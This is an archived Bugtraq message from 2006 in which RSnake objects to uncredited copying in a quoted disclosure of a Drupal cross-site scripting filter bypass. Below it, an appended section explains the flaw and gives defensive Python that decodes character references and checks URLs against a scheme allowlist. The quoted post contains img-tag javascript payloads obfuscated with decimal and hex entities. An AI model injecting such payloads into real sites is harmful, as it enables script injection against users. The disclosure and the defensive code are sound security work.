Open Source and information security mailing list archives
 
Message-ID: <Pine.LNX.4.61.0601031237170.12498@fingers.shocking.com>
Date: Tue, 3 Jan 2006 12:38:59 -0800 (PST)
From: RSnake <rsnake@...cking.com>
To: liz0@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Drupal all versiyon xss cehennem.org



 	Hi, it would be nice if you could give me some props next time,
as this code is pulled straight from my site.  I don't mind if you
re-use it, but just plain ripping code from my site isn't super cool.

On Mon, 2 Jan 2006 liz0@...mail.com wrote:

> Drupal all version xss
> ----------------------------------------------------
> site:http://www.drupal.org
>
> Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
> --------------------------------------------------
>
> img tag : on
>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------------
>
> Decimal Value: HTML (without semicolons)
>
> <img src=javascript:alert('XSS')>  = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> Decimal Value: HTML (with semicolons)
>
> <img src=javascript:alert('XSS')>  = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
>
>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> example:
> post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable
>
> post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable
>
>
> ---------------------------------------------------------
>
> Credit:Liz0ziM
> mail:liz0@...mail.com
> www.biyo.tk , www.cehennem.org
>
> Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
>
> -----------------------------------------------------------
> Source:
>
> http://liz0zim.no-ip.org/drupal.txt
>
> ------------------------------------------------------------
>
>


-R
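
The bypass in the quoted post works because the filter inspects the raw attribute text, while the browser decodes character references (with or without semicolons) before it interprets the URL. As an added example, not code from the post, from Drupal, or from either author, the Python below decodes first and then allowlists the URL scheme; the allowlist, the function names and the sample values are assumptions constructed for illustration.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https", "mailto"}        # assumption: example allowlist
SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)
IGNORED = re.compile(r"[\x00-\x20\x7f]")             # whitespace/control chars, stripped conservatively

def naive_is_safe(value: str) -> bool:
    """Blocklist on the raw text: the kind of check the quoted post bypasses."""
    return "javascript:" not in value.lower()

def url_is_safe(value: str) -> bool:
    """Decode character references first, then allowlist the scheme."""
    decoded = html.unescape(value)       # accepts &#106, &#106; and &#x6A alike
    decoded = IGNORED.sub("", decoded)   # "jav<TAB>ascript:" collapses to "javascript:"
    match = SCHEME.match(decoded)
    if match is None:
        return True                      # no scheme at all: relative URL
    return match.group(1).lower() in ALLOWED_SCHEMES

def as_refs(text: str, fmt: str) -> str:
    """Encode every character as a numeric reference without a semicolon."""
    return "".join(fmt.format(ord(c)) for c in text)

PLAIN = "javascript:alert('XSS')"
SAMPLES = {                              # constructed to mirror the encodings in the post
    "plain": PLAIN,
    "decimal_no_semicolon": as_refs(PLAIN, "&#{}"),
    "hex_no_semicolon": as_refs(PLAIN, "&#x{:X}"),
    "benign_absolute": "https://example.org/logo.png",
    "benign_relative": "files/logo.png",
}

def audit(samples=SAMPLES):
    """Return {name: (naive verdict, decode-then-allowlist verdict)}."""
    return {name: (naive_is_safe(v), url_is_safe(v)) for name, v in samples.items()}

if __name__ == "__main__":
    for name, (naive, hardened) in audit().items():
        print(f"{name:22} naive={naive!s:5} hardened={hardened}")
```

Escaping the value on output is still required; this check only decides whether the URL may be used as an attribute value at all.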

